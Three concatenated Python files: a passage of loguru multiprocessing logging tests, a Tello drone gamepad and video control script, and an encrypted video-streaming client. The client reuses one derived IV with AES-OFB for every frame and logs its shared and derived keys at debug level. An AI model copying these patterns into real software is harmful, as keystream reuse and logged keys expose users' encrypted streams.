with ctx.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
pool.apply(do_something, (i,))
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
with multiprocessing.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
pool.apply(do_something, (i,))
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
with multiprocessing.Pool(1) as pool:
for i in range(3):
pool.apply(do_something, (i,))
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
def test_apply_async_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
with ctx.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
result = pool.apply_async(do_something, (i,))
result.get()
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_async_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
with multiprocessing.Pool(1, set_logger, [logger]) as pool:
for i in range(3):
result = pool.apply_async(do_something, (i,))
result.get()
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_apply_async_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
with multiprocessing.Pool(1) as pool:
for i in range(3):
result = pool.apply_async(do_something, (i,))
result.get()
pool.close()
pool.join()
logger.info("Done!")
logger.remove()
assert writer.read() == "#0\n#1\n#2\nDone!\n"
def test_process_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
process = ctx.Process(target=subworker, args=(logger,))
process.start()
process.join()
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_process_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
process = multiprocessing.Process(target=subworker, args=(logger,))
process.start()
process.join()
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_process_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
process = multiprocessing.Process(target=subworker_inheritance)
process.start()
process.join()
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
def test_remove_in_child_process_spawn(monkeypatch):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
process = ctx.Process(target=subworker_remove, args=(logger,))
process.start()
process.join()
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_child_process_fork():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
process = multiprocessing.Process(target=subworker_remove, args=(logger,))
process.start()
process.join()
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_child_process_inheritance():
writer = Writer()
logger.add(writer, format="{message}", enqueue=True)
process = multiprocessing.Process(target=subworker_remove_inheritance)
process.start()
process.join()
logger.info("Main")
logger.remove()
assert writer.read() == "Child\nMain\n"
def test_remove_in_main_process_spawn(monkeypatch):
# Actually, this test may fail if sleep time in main process is too small (and no barrier used)
# In such situation, it seems the child process has not enough time to initialize itself
# It may fail with an "EOFError" during unpickling of the (garbage collected / closed) Queue
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
writer = Writer()
barrier = ctx.Barrier(2)
logger.add(writer, format="{message}", enqueue=True)
process = ctx.Process(target=subworker_barrier, args=(logger, barrier))
process.start()
barrier.wait()
logger.info("Main")
logger.remove()
process.join()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_main_process_fork():
writer = Writer()
barrier = multiprocessing.Barrier(2)
logger.add(writer, format="{message}", enqueue=True)
process = multiprocessing.Process(target=subworker_barrier, args=(logger, barrier))
process.start()
barrier.wait()
logger.info("Main")
logger.remove()
process.join()
assert writer.read() == "Child\nMain\n"
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_remove_in_main_process_inheritance():
writer = Writer()
barrier = multiprocessing.Barrier(2)
logger.add(writer, format="{message}", enqueue=True)
process = multiprocessing.Process(target=subworker_barrier_inheritance, args=(barrier,))
process.start()
barrier.wait()
logger.info("Main")
logger.remove()
process.join()
assert writer.read() == "Child\nMain\n"
def test_not_picklable_sinks_spawn(monkeypatch, tmpdir, capsys):
ctx = multiprocessing.get_context("spawn")
monkeypatch.setattr(loguru._handler, "multiprocessing", ctx)
filepath = tmpdir.join("test.log")
stream = sys.stderr
output = []
logger.add(str(filepath), format="{message}", enqueue=True)
logger.add(stream, format="{message}", enqueue=True)
logger.add(lambda m: output.append(m), format="{message}", enqueue=True)
process = ctx.Process(target=subworker, args=[logger])
process.start()
process.join()
logger.info("Main")
logger.remove()
out, err = capsys.readouterr()
assert filepath.read() == "Child\nMain\n"
assert out == ""
assert err == "Child\nMain\n"
assert output == ["Child\n", "Main\n"]
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_not_picklable_sinks_fork(capsys, tmpdir):
filepath = tmpdir.join("test.log")
stream = sys.stderr
output = []
logger.add(str(filepath), format="{message}", enqueue=True)
logger.add(stream, format="{message}", enqueue=True)
logger.add(lambda m: output.append(m), format="{message}", enqueue=True)
process = multiprocessing.Process(target=subworker, args=[logger])
process.start()
process.join()
logger.info("Main")
logger.remove()
out, err = capsys.readouterr()
assert filepath.read() == "Child\nMain\n"
assert out == ""
assert err == "Child\nMain\n"
assert output == ["Child\n", "Main\n"]
@pytest.mark.skipif(os.name == "nt", reason="Windows does not support forking")
def test_not_picklable_sinks_inheritance(capsys, tmpdir):
filepath = tmpdir.join("test.log")
stream = sys.stderr
output = []
logger.add(str(filepath), format="{message}", enqueue=True)
logger.add(stream, format="{message}", enqueue=True)
logger.add(lambda m: output.append(m), format="{message}", enqueue=True)
process = multiprocessing.Process(target=subworker_inheritance)
process.start()
process.join()
logger.info("Main")
logger.remove()
out, err = capsys.readouterr()
assert filepath.read() == "Child\nMain\n"
assert out == ""
assert err == "Child\nMain\n"
assert output == ["Child\n", "Main\n"]
|
Tello3_video.py | # tello demo by Ryze Robotics, modified by Martin Piehslinger
# added video and gamepad support
# learned from (among others):
# https://learnopencv.com/read-write-and-display-a-video-using-opencv-cpp-python/
# https://docs.opencv.org/4.5.1/d7/d9e/tutorial_video_write.html
import threading
import socket
import sys
import time
import os
import inputs # for gamepad
from pythonping import ping
import argparse
import cv2
#------------------------------------------------------------------------
def waitForConnection (IpAddress):
''' send pings to IpAddress until ping is successful. No timeout, will wait forever. '''
Count = 0
Connected = False
while (not Connected):
Count = Count + 1
PingError = False
try:
PingResult = (ping(IpAddress,timeout=1,count=1))
except Exception as e:
print (str(e))
PingError = True
if (not PingError):
if ((PingResult.success())):
Connected = True
if (not Connected):
# print ('waiting for connection ' + str (Count) + ' ...') # Python2 version
print ('waiting for connection ' + str (Count) + ' ...', end = "\r") # Python3 version
time.sleep (1)
print ("connected.")
#-----------------------------------------------------------------------------------
def recv():
'''task to receive information from Tello. Simply print message to screen'''
global TimeSent
global Running
global DataDecoded
print ("Tello recv task started")
count = 0
while Running:
RecvError = False
try:
data, server = sock.recvfrom(1518)
except Exception as e:
RecvError = True
if (str(e) == 'timed out'):
print (".", end = "") # python2 users, please remove this line
pass
else:
print ('\n------------------- Exception: ' + str(e) + '\n')
break
if (not RecvError):
DataDecoded = data.decode(encoding="utf-8")
print(DataDecoded)
#--------------------------------------------------------------
def expFunc (x):
# ignore = 3500
ignore = 500
if abs(x) < ignore:
y = 0
else:
if (x > 0):
sign = 1
else:
sign = -1
# sign = int(x / abs(x))
y = sign * 100 * ((abs (x) - ignore) / (32767 - ignore)) ** 2
y = int (y)
if (y > 100):
y = 100
if (y < -100):
y = -100
return y
#--------------------------------------------------------------
# def expFunc (x):
# y = int(x / 327)
# return y
#--------------------------------------------------------------
def rcCommand (RcArray):
'''create a command like rc 100 100 100 100 from an array of 4 integers'''
RcCommand = 'rc'
for Count in range (0,4):
stickVal = expFunc (RcArray[Count])
RcCommand = RcCommand + ' ' + str(stickVal)
# print (RcCommand)
return (RcCommand)
#-----------------------------------------------------------------------------------
def pad():
global Running
global RunningVideo
global Rc
global sock
pads = inputs.devices.gamepads
if (len(pads) > 0):
print ("found gamepad" + str(pads[0]))
pads[0].set_vibration(1, 1, 200)
while (Running):
msgPad = ''
events = inputs.get_gamepad()
for event in events:
# print(event.ev_type, event.code, event.state)
msgPad = "" # preset
if (event.ev_type == "Absolute"):
if (event.code == "ABS_X"):
Rc[3] = event.state
msgPad = rcCommand (Rc)
elif (event.code == "ABS_Y"):
Rc[2] = event.state
msgPad = rcCommand (Rc)
elif (event.code == "ABS_RX"):
Rc[0] = event.state
msgPad = rcCommand (Rc)
elif (event.code == "ABS_RY"):
Rc[1] = event.state
msgPad = rcCommand (Rc)
elif (event.code == "ABS_Z"): # left trigger ... very slow rotation left
Rc[3] = event.state * (-100)
msgPad = rcCommand (Rc)
elif (event.code == "ABS_RZ"): # right trigger ... very slow rotation right
Rc[3] = event.state * 100
msgPad = rcCommand (Rc)
elif (event.code == "ABS_HAT0X"):
if (event.state == -1):
msgPad = "flip l"
elif (event.state == 1):
msgPad = "flip r"
elif (event.code == "ABS_HAT0Y"):
if (event.state == -1):
msgPad = "flip f"
elif (event.state == 1):
msgPad = "flip b"
elif (str(event.ev_type) == "Key"):
if (event.code == "BTN_NORTH"):
if (str(event.state) == "1"):
msgPad = "takeoff"
elif (event.code == "BTN_SOUTH"):
if (str(event.state) == "1"):
msgPad = "land"
elif (event.code == "BTN_WEST"):
if (str(event.state) == "1"):
msgPad = "battery?"
elif (event.code == "BTN_EAST"):
if (str(event.state) == "1"):
Running = False
elif (event.code == "BTN_TL"):
if (str(event.state) == "1"):
RunningVideo = True
msgPad = "streamon"
print ("starting video")
elif (event.code == "BTN_TR"):
if (str(event.state) == "1"):
RunningVideo = False
# msgPad = "streamoff" # seems to be contraproductive
print ("stopping video")
elif (event.code == "BTN_START"):
if (str(event.state) == "1"):
msgPad = "rc -100 -100 -100 100"
print ("starting motors")
elif (event.code == "BTN_THUMBR 1"):
if (str(event.state) == "1"):
msgPad = "emergency"
elif (event.code == "BTN_THUMBL 1"):
if (str(event.state) == "1"):
msgPad = "emergency"
elif (event.code == "BTN_SELECT"):
if (str(event.state) == "1"):
msgPad = "emergency"
if (msgPad != ""):
if not 'rc' in msgPad: # don't print rc messages
# if (1):
print (msgPad)
msgPad = msgPad.encode(encoding="utf-8")
try:
sent = sock.sendto(msgPad, tello_address)
except Exception as e:
print (str(e))
else:
print ("No gamepad found")
print ("pad task ended")
#-----------------------------------------------------------------------------------
def video():
global out
global displayVideo
global writeVideo
global RunningVideo
global Running
print ("video task started")
print (displayVideo, writeVideo)
# wait for frame
ret = False
# scale down
scale = 1
while Running:
# wait until video is started by user
while Running and not RunningVideo:
time.sleep (1)
if not Running: # if video is not started at all, and user terminates the program
print ("video task ended")
return
print ('One moment please...')
time.sleep(3) # give tello some time to start the video stream
if (displayVideo):
print ("opening video window")
cv2.namedWindow('Tello')
print ('opening camera feed')
telloVideo = cv2.VideoCapture("udp://@0.0.0.0:11111")
if (telloVideo.isOpened() == False):
print("Unable to read camera feed")
else:
time.sleep(3) # give ffmpeg some time to analyze video stream
frame_width = int(telloVideo.get(cv2.CAP_PROP_FRAME_WIDTH))
frame_height = int(telloVideo.get(cv2.CAP_PROP_FRAME_HEIGHT))
frame_fps = telloVideo.get(cv2.CAP_PROP_FPS)
frame_fourcc = telloVideo.get(cv2.CAP_PROP_FOURCC)
print (frame_width, ' x ', frame_height, ' ', frame_fps, 'fps', ', fourcc: ', frame_fourcc)
if writeVideo:
# find a filename which doesn't yet exist
found = False
count = 0
while (not found):
filenameToWrite = 'telloVideo' + str(count).zfill(3) + '_' + args.codec + '.' + args.ext
if (os.path.exists(filenameToWrite)):
count = count + 1
else:
found = True
codecString = args.codec
while (len(codecString) < 4): # if codecString is less than 4 characters, add blank(s)
codecString = codecString + ' '
fourcc = cv2.VideoWriter_fourcc(*codecString)
print (hex(fourcc))
out = cv2.VideoWriter(filenameToWrite, fourcc, frame_fps, (frame_width,frame_height))
videoInterval = 1 / frame_fps
timeNextFrame = time.time() + videoInterval
timeStart = time.time()
numFramesReceived = 0
numFramesWritten = 0
numGlitches = 0
numSkipped = 0
numFailed = 0
while Running and RunningVideo:
# Capture frame-by-frame
ret, frame = telloVideo.read()
if(ret):
numFramesReceived = numFramesReceived + 1
now = time.time()
if (now >= timeNextFrame):
timeNextFrame = timeNextFrame + videoInterval
if (now > timeNextFrame): # if we missed a frame
numGlitches = numGlitches + 1
if writeVideo:
out.write(frame)
numFramesWritten = numFramesWritten + 1
# Display the frame
if (displayVideo):
if (args.scale != 1.0):
height , width , layers = frame.shape
new_h=int(height/args.scale)
new_w=int(width/args.scale)
frame = cv2.resize(frame, (new_w, new_h)) # <- resize for improved performance
cv2.imshow('Tello',frame)
cv2.waitKey(1) # this is essential, otherwise cv2 won't show anything!
else:
numSkipped = numSkipped + 1 # we received a frame too early, so we skipped it
else:
numFailed = numFailed + 1
print ('stopping video')
timeVideo = time.time() - timeStart
# When everything is done, clean up
if writeVideo:
out.release()
if (displayVideo):
cv2.destroyAllWindows()
telloVideo.release()
# do some statistics
print ("time: ", timeVideo)
print (numFramesReceived, "frames received, ", "%.2f" % (numFramesReceived/timeVideo), " fps")
print (numFramesWritten, "frames written", "%.2f" % (numFramesWritten/timeVideo), " fps")
print (numGlitches, " glitches")
print (numFailed, " frames failed")
print (numSkipped, " frames skipped")
print ("video task ended")
#-----------------------------------------------------------------------------------
print ('\r\n\r\nTello Python3 Demo.\r\n')
print ('get help with parameter -h\r\n')
print ('Steer Tello with keyboard commands or gamepad')
print ('Issue normal Tello commands like takeoff')
print ('Additional commands: ')
print (' start (start motors without taking off), ')
print (' video (start video), ')
print (' oediv (stop video), ')
print (' end (end program)')
parser = argparse.ArgumentParser(description = "Tello Joystick Video", epilog = "Steer with keyboard commands like \"takeoff\" or with gamepad, start video with command \"video\" or with left shoulder button of gamepad")
parser.add_argument("-d", "--display", type=str, default='no', help="display video yes/no, default = no")
parser.add_argument("-s", "--scale", type=float, default=1.0, help="scale down video frame for performance reasons, default = 1.0 (don't rescale)")
parser.add_argument("-w", "--write", type=str, default='no', help="write video yes/no, default = no")
parser.add_argument("-c", "--codec", type=str, default='XVID', help="Video compression codec, default = XVID")
parser.add_argument("-e", "--ext", type=str, default='avi', help="Video file extension, default = avi")
args = parser.parse_args()
Running = True
RunningVideo = False
DataDecoded = ""
out = None
if ("Y" in args.display.upper()):
displayVideo = True
else:
displayVideo = False
if ("Y" in args.write.upper()):
writeVideo = True
else:
writeVideo = False
host = ''
# port = 9000
port = 8889
locaddr = (host,port)
# Create a UDP socket
IpAddress = '192.168.10.1' # hard coded. For Tello EDU, we could add ip as a a parameter
tello_address = (IpAddress, 8889)
# tello_address = (IpAddress, port)
waitForConnection (IpAddress)
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
sock.settimeout (1)
sock.bind(locaddr)
TimeSend = 0
Rc = [0,0,0,0]
#recvThread create
recvThread = threading.Thread(target=recv)
recvThread.start()
#videoThread create
videoThread = threading.Thread(target=video)
videoThread.start()
# padThread create
padThread = threading.Thread(target=pad)
padThread.start()
msg = 'command' # initial command to enter sdk mode
while Running:
if (msg == ''):
msg = input(">")
if 'video' in msg: # start video
RunningVideo = True;
msg = 'streamon'
elif 'oediv' in msg: # "video", read backwards .... stop video
RunningVideo = False;
# msg = 'streamoff' # seems to be contraproductive
msg = ''
elif 'start' in msg:
msg = "rc -100 -100 -100 100" # start motors
elif 'end' in msg: # end program
print ('...')
Running = False
RunningVideo = False
msg = ''
if (msg != ''):
# Send data
msg = msg.encode(encoding="utf-8")
sent = sock.sendto(msg, tello_address)
print (str(sent) + ' bytes sent')
msg = ''
TimeShutdown = 2
print ("Will shut down in " + str(TimeShutdown) + " seconds")
time.sleep (TimeShutdown) # give recv task some time to end
sock.close()
exit()
|
streaming_secured_client.py | import socket
import cv2
import pickle
import struct
import threading
import argparse
import errno
import time
# For encryption
from cryptography.hazmat.primitives import hashes, hmac
from cryptography.hazmat.primitives.asymmetric import dh, padding, ec
from cryptography.hazmat.primitives.kdf.hkdf import HKDF
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives.serialization import PublicFormat, \
Encoding, load_der_public_key, load_pem_public_key, load_pem_private_key
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.exceptions import InvalidSignature
# Needed for logging
import logging
watching = True
watch_char = {
0: "/",
1: "-",
2: "|",
3: "\\",
4: "|",
}
disable_ecdh = False
# thread that listens for any input, used to terminate stream loop
def key_capture_thread():
global watching
main_logger = logging.getLogger("main")
input()
watching = False
main_logger.info("Starting exit process")
def encrypt(key, plaintext, iv):
# Declare cipher type
cipher = Cipher(algorithms.AES(key), modes.OFB(iv))
encryptor = cipher.encryptor()
# Encrypt
ciphertext = encryptor.update(plaintext) + encryptor.finalize()
return ciphertext
def decrypt(key, ciphertext, iv):
# Declare cipher type
cipher = Cipher(algorithms.AES(key), modes.OFB(iv))
decryptor = cipher.decryptor()
# Decrypt
deciphered_text = decryptor.update(ciphertext) + decryptor.finalize()
return deciphered_text
def generate_dh_key_pairs():
# Hard-coded p and g for DH Key exchange (RFC 3526 - group id 14)
p = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AACAA68FFFFFFFFFFFFFFFF # noqa: E501
g = 2
# Use our p and g with cryptography library
params_numbers = dh.DHParameterNumbers(p, g)
parameters = params_numbers.parameters(default_backend())
# Generate private and public key
host_private_key = parameters.generate_private_key()
host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER, PublicFormat.SubjectPublicKeyInfo)
return (host_private_key, host_public_key_enc)
def generate_ecdh_key_pairs():
host_private_key = ec.generate_private_key(
ec.SECP384R1()
)
host_public_key_enc = host_private_key.public_key().public_bytes(Encoding.DER, PublicFormat.SubjectPublicKeyInfo)
return (host_private_key, host_public_key_enc)
def client_dh_key_exchange(host_socket, host_private_key, host_public_key_enc,
serialized_RSA_server_public_key, serialized_RSA_client_public_key,
RSA_client_private_key):
global disable_ecdh
main_logger = logging.getLogger("main")
# Receiving size of remote's public key and remote's public key
size = host_socket.recv(2)
remote_public_key_enc = host_socket.recv(int.from_bytes(size, "big"))
main_logger.debug(f"Size of remote's public key: {int.from_bytes(size, 'big')}")
main_logger.debug(f"Remote's public key: {remote_public_key_enc}")
# Decode remote's public key
remote_public_key = load_der_public_key(remote_public_key_enc, default_backend())
# Send Message to let server know it's going to send the public key
# Compose constructed message for signature
message_to_be_signed = (serialized_RSA_server_public_key +
serialized_RSA_client_public_key +
remote_public_key_enc +
host_public_key_enc)
message_signature = sign(RSA_client_private_key, message_to_be_signed)
host_socket.send(b"PUBK" +
len(host_public_key_enc).to_bytes(2, "big") +
host_public_key_enc +
len(message_signature).to_bytes(2, "big") +
message_signature)
main_logger.debug(f"Sent host's public key to {host_ip}:{port}")
# Get server's signature
size = host_socket.recv(2)
remote_signature = host_socket.recv(int.from_bytes(size, "big"))
# Verify server's signature
intended_message = serialized_RSA_server_public_key + host_public_key_enc
verify(load_pem_public_key(serialized_RSA_server_public_key), remote_signature, intended_message)
# Generate shared key
if disable_ecdh:
shared_key = host_private_key.exchange(remote_public_key)
else:
shared_key = host_private_key.exchange(ec.ECDH(), remote_public_key)
main_logger.debug(f"Shared Key: {shared_key}")
return shared_key
def receive_and_decrypt_AES_OFB_message(host_socket, derived_key, derived_iv):
size = host_socket.recv(2)
ciphertext = host_socket.recv(int.from_bytes(size, "big"))
deciphered_text = decrypt(derived_key, ciphertext, derived_iv)
return deciphered_text
def lookupIP(client_socket, public_key):
client_socket.send(b'1')
client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
output = client_socket.recv(1024)
return output
def registerPublicKey(client_socket, public_key, private_key):
client_socket.send(b'0')
signed_public_key = sign(private_key, public_key)
client_socket.send(len(public_key).to_bytes(2, "big") + public_key)
client_socket.send(len(signed_public_key).to_bytes(2, "big") + signed_public_key)
output = client_socket.recv(1024)
return output
def sign(private_key, data):
signature = private_key.sign(
data,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
return signature
def verify(public_key, signature, message):
main_logger = logging.getLogger("main")
main_logger.debug("Verifying")
main_logger.debug(f"public_key: {public_key}")
main_logger.debug(f"signature: {signature}")
main_logger.debug(f"message: {message}")
# Verify signature
public_key.verify(
signature,
message,
padding.PSS(
mgf=padding.MGF1(hashes.SHA256()),
salt_length=padding.PSS.MAX_LENGTH
),
hashes.SHA256()
)
if __name__ == '__main__':
# Setup Logging
main_logger_Format = '{"Timestamp":"%(asctime)s", "Logger":"%(name)s", "Level":"%(levelname)s", "Message":"%(message)s"}' # noqa: E501
main_logger = logging.getLogger("main")
main_logger_ch = logging.StreamHandler()
main_formatter = logging.Formatter(main_logger_Format)
main_logger.setLevel(logging.WARNING)
main_logger_ch.setLevel(logging.WARNING)
# Handle arguments
ap = argparse.ArgumentParser()
ap.add_argument("-i", "--host-ip", type=str, required=False,
help="ip address of the server to connect to, default: 127.0.0.1", default='127.0.0.1')
ap.add_argument("-p", "--port", type=int, required=False,
help="port number to connect to, default: 9898", default=9898)
ap.add_argument("--pki-host-ip", type=str, required=False,
help="ip address of the PKI server to connect to, default: 127.0.0.1", default='127.0.0.1')
ap.add_argument("--pki-port", type=int, required=False,
help="PKI port number to connect to, default: 7777", default=7777)
ap.add_argument("--rsa-pub-key", type=str, required=False,
help="Path to RSA PEM public key, default: env/keys/client/client_01/public-key.pem",
default='env/keys/client/client_01/public-key.pem')
ap.add_argument("--rsa-priv-key", type=str, required=False,
help="Path to RSA PEM private key, default: env/keys/client/client_01/private-key.pem",
default='env/keys/client/client_01/private-key.pem')
ap.add_argument("--disable-ecdh", type=bool, required=False,
help="Disable Elliptic Curve key generation for Diffie-Hellman Key Exchange, needs to match server, default: False", # noqa: E501
default=False)
ap.add_argument("-l", "--log-level", type=str, required=False,
help="Level of logging: info, debug, warning, error, default: warning", default='warning')
args = vars(ap.parse_args())
if (args["log_level"].lower() not in ["info", "warning", "debug", "error"]):
argparse.error('Unexpected log level entered. Valid choices are: info, error, warning, debug')
if args["log_level"].lower() == "info":
main_logger.setLevel(logging.INFO)
main_logger_ch.setLevel(logging.INFO)
elif args["log_level"].lower() == "warning":
main_logger.setLevel(logging.WARNING)
main_logger_ch.setLevel(logging.WARNING)
elif args["log_level"].lower() == "debug":
main_logger.setLevel(logging.DEBUG)
main_logger_ch.setLevel(logging.DEBUG)
elif args["log_level"].lower() == "error":
main_logger.setLevel(logging.ERROR)
main_logger_ch.setLevel(logging.ERROR)
main_logger_ch.setFormatter(main_formatter)
main_logger.addHandler(main_logger_ch)
disable_ecdh = args["disable_ecdh"]
if disable_ecdh:
main_logger.info("ECDH is disabled, using DSA keys with Diffie-Hellman")
else:
main_logger.info("Using ECDH for key exchange")
RSA_client_public_key = None
RSA_client_private_key = None
main_logger.info("Loading RSA keys...")
with open(args["rsa_pub_key"], "rb") as key_file:
RSA_client_public_key = load_pem_public_key(
key_file.read()
)
with open(args["rsa_priv_key"], "rb") as key_file:
RSA_client_private_key = load_pem_private_key(
key_file.read(),
password=None,
)
# Serialize keys
serialized_RSA_client_public_key = RSA_client_public_key.public_bytes(Encoding.PEM,
PublicFormat.SubjectPublicKeyInfo)
main_logger.debug(f"Public Key Loaded: {serialized_RSA_client_public_key}")
# ## --------- PKI Register Pub Keys START-----------##
# pki_client_socket = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
# pki_host_ip = args["pki_host_ip"]
# pki_port = args["pki_port"]
# pki_client_socket.connect((pki_host_ip,pki_port))
# response = registerPublicKey(pki_client_socket, serialized_RSA_client_public_key, RSA_client_private_key)
# main_logger.info("PKI response:", response)
# pki_client_socket.close()
# ## --------- PKI Register Pub Keys END -----------##
# create socket
client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host_ip = args["host_ip"]
port = args["port"]
abort = False
threading.Thread(target=key_capture_thread, args=(), name='key_capture_thread', daemon=True).start()
frames_processed_counter = 0
try:
# Generate new dh key pairs before each connection
if disable_ecdh:
client_private_key, client_public_key_enc = generate_dh_key_pairs()
else:
client_private_key, client_public_key_enc = generate_ecdh_key_pairs()
# Initialize Connection
client_socket.connect((host_ip, port))
serialized_RSA_server_public_key = None
initial_message = (b"HELO" +
len(serialized_RSA_client_public_key).to_bytes(2, "big") +
serialized_RSA_client_public_key)
client_socket.sendall(initial_message)
# === GET RSA PUBLIC KEY START ===
data = client_socket.recv(4)
if data == b"HELO":
size = client_socket.recv(2)
serialized_RSA_server_public_key = client_socket.recv(int.from_bytes(size, "big"))
elif data == b"RJKT":
main_logger.info("Stream is running in restricted mode, only whitelisted users allowed")
abort = True
exit()
else:
abort = True
# === GET RSA PUBLIC KEY END ===
# === DH KEY EXCHANGE START ===
client_socket.sendall(b"DHINI")
shared_key = client_dh_key_exchange(client_socket,
client_private_key,
client_public_key_enc,
serialized_RSA_server_public_key,
serialized_RSA_client_public_key,
RSA_client_private_key)
data = client_socket.recv(5)
if data == b"DHFIN":
main_logger.debug("Finished DH Key Exchange")
# === DH KEY EXCHANGE END ===
# Derive Key from shared key, length is in byte (32 byte = 256 bit)
derived_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'handshake data',).derive(shared_key)
main_logger.debug(f"Derived Key: {derived_key}")
# A 16 byte IV will be derived so both client and server has the same IV.
derived_iv = HKDF(algorithm=hashes.SHA256(), length=16, salt=None, info=b'aes ofb iv',).derive(shared_key)
main_logger.debug("Derived IV: {derived_iv}")
# HMAC key
derived_hmac_key = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'mac',).derive(shared_key)
main_logger.debug(f"Derived HMAC Key: {derived_hmac_key}")
# Session ID
derived_session_id = HKDF(algorithm=hashes.SHA256(), length=32, salt=None, info=b'session id',).derive(shared_key) # noqa: E501
main_logger.debug(f"Derived Session ID: {derived_session_id}")
component_id_tracker = 0
# initialize data var
data = b""
# Specify size as 8 bytes
payload_size = struct.calcsize("Q")
smud = 0
stracker = 0
start_time = time.time()
while watching:
client_socket.send(b"READY")
# Grab packet
while len(data) < payload_size:
packet = client_socket.recv(4*1024)
if smud < 200:
if smud % 20 == 0:
time_passed = time.time() - start_time
avg_fps = frames_processed_counter / time_passed
avg_fps = "{0:.2f}".format(avg_fps)
print(f"{watch_char[stracker]} watching stream {watch_char[stracker]} AVG FPS: {avg_fps}", end="\r") # noqa: E501
stracker += 1
if stracker > 4:
stracker = 0
smud += 1
else:
smud = 0
if not packet:
break
data += packet
# Verify data sizes
recv_hmac_sig = data[:32]
if len(recv_hmac_sig) != 32:
continue
remote_session_id = data[32:32+32]
if len(remote_session_id) != 32:
continue
remote_bytes_component_id = data[32+32:32+32+4]
if len(remote_bytes_component_id) != 4:
continue
packed_msg_size = data[32+32+4:32+32+4+payload_size]
if len(packed_msg_size) != payload_size:
continue
# Get the encrypted frame
data = data[32+32+4+payload_size:]
# Unpack to get real size of expected message
msg_size = struct.unpack("Q", packed_msg_size)[0]
# Get the rest of the frame data
while (len(data) < msg_size) and (len(data) < 1536165):
data += client_socket.recv(4*1024)
# Store the full frame data
frame_data = data[:msg_size]
# Verification
# Verify HMAC
recv_message = remote_session_id + remote_bytes_component_id + packed_msg_size + frame_data
h = hmac.HMAC(derived_hmac_key, hashes.SHA256())
h.update(recv_message)
try:
h.verify(recv_hmac_sig)
except InvalidSignature:
continue
# Verify session id matches
if derived_session_id != remote_session_id:
continue
# Verify component id increased
remote_int_component_id = int.from_bytes(remote_bytes_component_id, "big")
if remote_int_component_id <= component_id_tracker:
continue
else:
component_id_tracker = remote_int_component_id
# Decrypt data
frame_data = decrypt(derived_key, frame_data, derived_iv)
# Keep the tail data in data variable
data = data[msg_size:]
# Deserialize frame data
frame = pickle.loads(frame_data)
# Display the images
cv2.imshow("WATCHING %s STREAM" % (host_ip), frame)
key = cv2.waitKey(1) & 0xFF
